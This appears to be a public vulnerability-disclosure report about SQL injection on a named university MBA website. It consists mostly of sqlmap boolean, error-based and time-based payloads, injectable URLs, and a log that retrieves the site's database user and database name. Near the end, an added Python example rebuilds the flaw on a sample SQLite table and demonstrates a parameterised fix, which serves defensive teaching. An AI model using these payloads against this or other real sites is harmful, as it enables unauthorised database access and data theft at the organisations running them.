2016-01-11: Details reported to the vendor, awaiting vendor response
2016-01-11: Vendor has confirmed; details disclosed to the vendor only
2016-01-21: Details disclosed to core white hats and relevant domain experts
2016-01-31: Details disclosed to regular white hats
2016-02-10: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public
Bundled them all together, please give a bit more RANK.
Injection point: http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=W&first_char=L&job_title=2
Parameter 1: first_char
Parameter 2: job_title
Parameter: first_char (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: first_char=W&first_char=L' AND 5694=5694 AND 'AvDK'='AvDK&job_title=2

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: first_char=W&first_char=L' AND (SELECT 4453 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(4453=4453,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'epXZ'='epXZ&job_title=2

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: first_char=W&first_char=L' AND (SELECT * FROM (SELECT(SLEEP(5)))dkdz) AND 'EeHe'='EeHe&job_title=2

Parameter: job_title (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: first_char=W&first_char=L&job_title=2 AND 1165=1165

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: first_char=W&first_char=L&job_title=2 AND (SELECT 6652 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(6652=6652,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: first_char=W&first_char=L&job_title=2 AND (SELECT * FROM (SELECT(SLEEP(5)))lvuL)
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: first_char, type: Single quoted string (default)
[1] place: GET, parameter: job_title, type: Unescaped numeric
[q] Quit
> 0
[16:00:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9
back-end DBMS: MySQL 5.0
[16:00:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 346 times
[16:00:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/mba.bus.sysu.edu.cn'
[*] shutting down at 16:00:48
sqlmap -u "http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=W&first_char=L&job_title=2" -p job_title --current-db --current-user
[16:07:04] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9
back-end DBMS: MySQL 5.0
[16:07:04] [INFO] fetching current user
[16:07:04] [WARNING] reflective value(s) found and filtering out
[16:07:04] [INFO] retrieved: zsgy@localhost
current user: 'zsgy@localhost'
[16:07:04] [INFO] fetching current database
[16:07:04] [INFO] retrieved: zsbm
current database: 'zsbm'
http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&sdept=8

http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=L&job_title=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&sdept=8

http://mba.bus.sysu.edu.cn/site/getmore?page=2&page=%5c index/[email protected]&email='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(113)%2cCHAR(81)%2cCHAR(81)%2cCHAR(113)%2cCHAR(106)%2cCHAR(102)%2cCHAR(57)%2cCHAR(122))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
Then I ran a scan with WVS; everything in here is SQL injection.

Ran one of them at random.

Fix suggestion: filter the input.
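The sqlmap output above reports two injection contexts on the same request: first_char sits inside single quotes and job_title is pasted in as an unescaped number, both confirmed by boolean-based blind tests (a true and a false condition producing different responses). The following is an added example, not code from the report or from the affected site, that reconstructs that flaw class against a small SQLite table and shows why "filter" as a fix should mean parameterised queries plus type validation rather than string escaping. The table `members`, its rows, and the column names are constructed for the demo; the real backend is MySQL and its schema is not on the page.

```python
import sqlite3

# Constructed sample table standing in for the site's backend (assumption: the
# real schema and the MySQL server are not on the page; SQLite is used so this
# runs offline). Column names follow the two injectable GET parameters.
SAMPLE_ROWS = [
    ("L", "Li Wei", 2),
    ("L", "Lu Fang", 2),
    ("L", "Liang Hao", 1),
    ("W", "Wang Min", 2),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members(first_char TEXT, name TEXT, job_title INTEGER)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn

def vulnerable_query(conn, first_char, job_title):
    # Reconstruction of the flaw class sqlmap reported: first_char lands inside
    # single quotes, job_title is concatenated in as a bare number.
    sql = ("SELECT name FROM members WHERE first_char = '%s' AND job_title = %s"
           % (first_char, job_title))
    return [row[0] for row in conn.execute(sql)]

def safe_query(conn, first_char, job_title):
    # Fix: bind both values as parameters and refuse a non-integer job_title.
    job_title = int(job_title)          # raises ValueError on "2 AND 1=1"
    sql = "SELECT name FROM members WHERE first_char = ? AND job_title = ?"
    return [row[0] for row in conn.execute(sql, (first_char, job_title))]

def boolean_blind_leaks(query, conn, true_case, false_case):
    """Boolean-based blind test: run the same request with an always-true and an
    always-false condition appended. Differing results mean the database
    evaluated the condition, i.e. the parameter is injectable."""
    def run(args):
        try:
            return query(conn, *args)
        except ValueError:              # safe_query rejecting the numeric payload
            return None
    return run(true_case) != run(false_case)

# Payloads in the shape sqlmap used on the page: quoted-string context for
# first_char, unescaped numeric context for job_title.
STRING_TRUE   = ("L' AND 1=1 AND 'a'='a", "2")
STRING_FALSE  = ("L' AND 1=2 AND 'a'='a", "2")
NUMERIC_TRUE  = ("L", "2 AND 1=1")
NUMERIC_FALSE = ("L", "2 AND 1=2")

def demo():
    conn = make_db()
    return {
        "vuln_first_char": boolean_blind_leaks(vulnerable_query, conn, STRING_TRUE, STRING_FALSE),
        "vuln_job_title":  boolean_blind_leaks(vulnerable_query, conn, NUMERIC_TRUE, NUMERIC_FALSE),
        "safe_first_char": boolean_blind_leaks(safe_query, conn, STRING_TRUE, STRING_FALSE),
        "safe_job_title":  boolean_blind_leaks(safe_query, conn, NUMERIC_TRUE, NUMERIC_FALSE),
    }

if __name__ == "__main__":
    for name, leaks in demo().items():
        print("%-16s injectable=%s" % (name, leaks))
```

Run stand-alone it prints `injectable=True` for both parameters of the concatenated query and `injectable=False` for the parameterised one. The numeric context is the one a quote-escaping "filter" would miss entirely: no quote is needed to inject into `job_title = 2 AND 1=1`, which is why the fix validates it as an integer instead of escaping it.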
Severity: High
Vulnerability Rank: 10
Confirmed at: 2016-01-11 15:38
Thank you, we will handle it right away.
None yet.